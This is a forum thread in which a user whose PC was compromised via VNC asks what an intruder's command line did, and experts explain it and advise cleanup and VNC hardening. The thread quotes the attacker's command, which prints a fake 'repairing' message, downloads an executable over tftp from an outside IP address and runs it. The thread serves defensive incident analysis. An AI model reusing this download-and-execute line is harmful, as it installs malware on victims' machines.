Solved

What is this cmdline attempting to do ?

Posted on 2007-11-27
8
290 Views
Last Modified: 2013-11-16
Hi,

We recently had a PC hacked via Real VNC. The Hacker executed the following command line.

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 81.88.110.178 GET cffhvvct.exe & start cffhvvct&

Can anyone explain what this has done ?

Regards

Rob
0
Comment
Question by:ertnev74
8 Comments
 
LVL 40

Accepted Solution

by:
RQuadling earned 350 total points
ID: 20357105
%comspec%

This is telling the computer to run the command shell as identified by %COMSPEC%

At the dos prompt type SET and enter and you will see COMSPEC.
Normally cmd.exe or (older windows) command.com


/c

Tells the comspec to run a command and then quit.


echo Repairing user32.dll

Output to the screen.

&
echo Please wait...

output to the screen.


&
tftp -i 81.88.110.178 GET cffhvvct.exe

Use the program tftp to get a file called cffhvvct.exe from the IP address of 81.88.110.178

&
start cffhvvct

Run the program just downloaded.




If you don't know the name of the program or the FTP site, don't run it.

I've just tried downloading the file from that site but it timedout.

If it was a virus, then the site may have been blocked or something else.
0
 
LVL 6

Assisted Solution

by:kamleshgwalani
kamleshgwalani earned 100 total points
ID: 20357113
Dear ertnev74,

Few weeks ago I got the same issue via VNC, it basically tries to dump 1.exe or 2.exe which is trojen. Basically search computer for virus and try to search 1.exe

U can manually end the process and renamed it and later delete it

Run the good antivirus softwares like Window Live Care or E-Wido

Read some more info
http://en.wikipedia.org/wiki/ComSpec
http://www.liutilities.com/products/wintaskspro/processlibrary/1/
0
 
LVL 40

Assisted Solution

by:RQuadling
RQuadling earned 350 total points
ID: 20357123
OK. Having read the question again.

Without having access to the program itself, absolutely ANYTHING could have happened.

I would STRONGLY recommend disconnecting the pc from the lan and running virus scanners and rootkit scanners.

SystemInternals Process Explorer (to see what is currently running and make sure YOU know it should be running).
SystemInternals RootKitRevealer (to see if any root kits exist).
SystemInternals AutoRuns (to see what is launched when the computer is turned on or when you login).
HijackThis is a similar program to AutoRuns, but produces a report which others can look at (http://www.spywareinfo.com/~merijn/programs.php)
0
 
LVL 47

Assisted Solution

by:rpggamergirl
rpggamergirl earned 50 total points
ID: 20357538
You could also try running some free scanners.
SUPERAntispyware:
http://www.superantispyware.com/

Download and install DrWebCureIt
http://www.freedrweb.com/

AVG Antispyware,
http://free.grisoft.com/doc/download-free-anti-spyware/us/frt/0


OR, run Combofix and upload the log for us to check.
Download ComboFix to your Desktop, from either of these locations:
http://www.techsupportforum.com/sectools/sUBs/ComboFix.exe
http://download.bleepingcomputer.com/sUBs/ComboFix.exe

Double click "combofix.exe" and follow the prompts.
When finished, it shall produce a log for you.
Upload the log at EE-Stuff.com for us to check please.
0
How your wiki can always stay up-to-date

Quip doubles as a “living” wiki and a project management tool that evolves with your organization. As you finish projects in Quip, the work remains, easily accessible to all team members, new and old.
- Increase transparency
- Onboard new hires faster
- Access from mobile/offline

 
LVL 6

Assisted Solution

by:kamleshgwalani
kamleshgwalani earned 100 total points
ID: 20357582
Sorry forgot to mentioned, always make sure that your firewall is turned on.
Or VNC Should be only enable as and when required.
If you can change the default port i.e. 5900 to some other ports would be helpful too, as this port is well known by hackers, so they just scan the port and enter into it.
I need this same thing with our guys and it solved my problem.

Now since the program has been executed on your machine, so better virus/spyware/trojen scan and then do the needful as above.
0
 
LVL 6

Expert Comment

by:kamleshgwalani
ID: 20357691
So what the problem? Were you able to find out 1.exe ?
0
 

Author Comment

by:ertnev74
ID: 20358036
All, thanks for you assistance with this query.

The user saw some activity on his screen last Thursday around midday. I advised him to shut off his router. When I got to his PC he explained what he had seen. Clicking on Start > Run I found the above cmdline.  

I looked up 'VNC being hacked' on EE and found a few solutions to recitify the situation. Once I made the box secure running Spyware / AV / Process Scanners I then looked at the cause and possible damage.
The cmdline was the only thing I didn't understand.... but I do now :)

The AV Scan removed a few trojans and viruses so I'm not to sure if 1.exe was on the box, however I was able to trace the IP of the hacker back to America.

Thanks again.
0
 
LVL 6

Expert Comment

by:kamleshgwalani
ID: 20359640
Thanks for the valuable feedback. The best is to make your windows firewall ON and keeps on Windows Patched !!!!
0

Featured Post

How to run any project with ease

Manage projects of all sizes how you want. Great for personal to-do lists, project milestones, team priorities and launch plans.
- Combine task lists, docs, spreadsheets, and chat in one
- View and edit from mobile/offline
- Cut down on emails

Join & Write a Comment

A brand new malware strain was recently discovered by security researchers at Palo Alto Networks dubbed “AceDeceiver.” This new strain of iOS malware can successfully infect non-jailbroken devices and jailbroken devices alike.
Cybersecurity has become the buzzword of recent years and years to come. The inventions of cloud infrastructure and the Internet of Things has made us question our online safety. Let us explore how cloud- enabled cybersecurity can help us with our b…
An introduction to basic programming syntax in Java by creating a simple program. Viewers can follow the tutorial as they create their first class in Java. Definitions and explanations about each element are given to help prepare viewers for future …
In this seventh video of the Xpdf series, we discuss and demonstrate the PDFfonts utility, which lists all the fonts used in a PDF file. It does this via a command line interface, making it suitable for use in programs, scripts, batch files — any pl…

744 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

10 Experts available now in Live!

Get 1:1 Help Now